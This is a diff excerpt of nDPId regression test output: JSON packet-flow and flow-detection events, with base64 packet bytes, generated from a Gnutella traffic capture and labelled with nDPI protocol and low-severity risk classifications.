-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co5AAIAGJkYKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":75108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gZBAAIAGBp8KAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":75264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnNAAIAGzTcKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":75280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75280,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvhAAIAGYVMKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOZAAIAGV+4KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYdAAIAGqOAKAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsVAAIAGE9AKAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faNAAIAGiKQKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zhAAIAGNBcKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":76233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76233,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLpAAIAGV00KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G1AAIAG6ukKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EJAAIAGLmEKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYdAAIAGFfcKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4pAAIAGtdYKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vG5AAIAGN8cKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKJAAIAGOesKAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":77138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77138,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZtAAIAGsgYKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":77329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdNAAIAG7kAKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP5AAIAGOukKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LZAAIAGCWYKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lylAAIAGNGEKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYhAAIAGqN8KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOdAAIAGV+0KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsZAAIAGE88KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":79200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79200,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KchAAIAGHhYKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UW1AAIAGasEKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kRAAIAGdAUKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A+BAAIAG2\/IKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJxAAIAGiMMKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnFAAIAGeL8KAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd9AAIAGwQIKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw1AAIAGfuAKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0RAAIAGinwKAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3VAAIAGoEwKAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pXBAAIAGEbUKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q81AAIAGVuQKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWxAAIAG8swKAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} 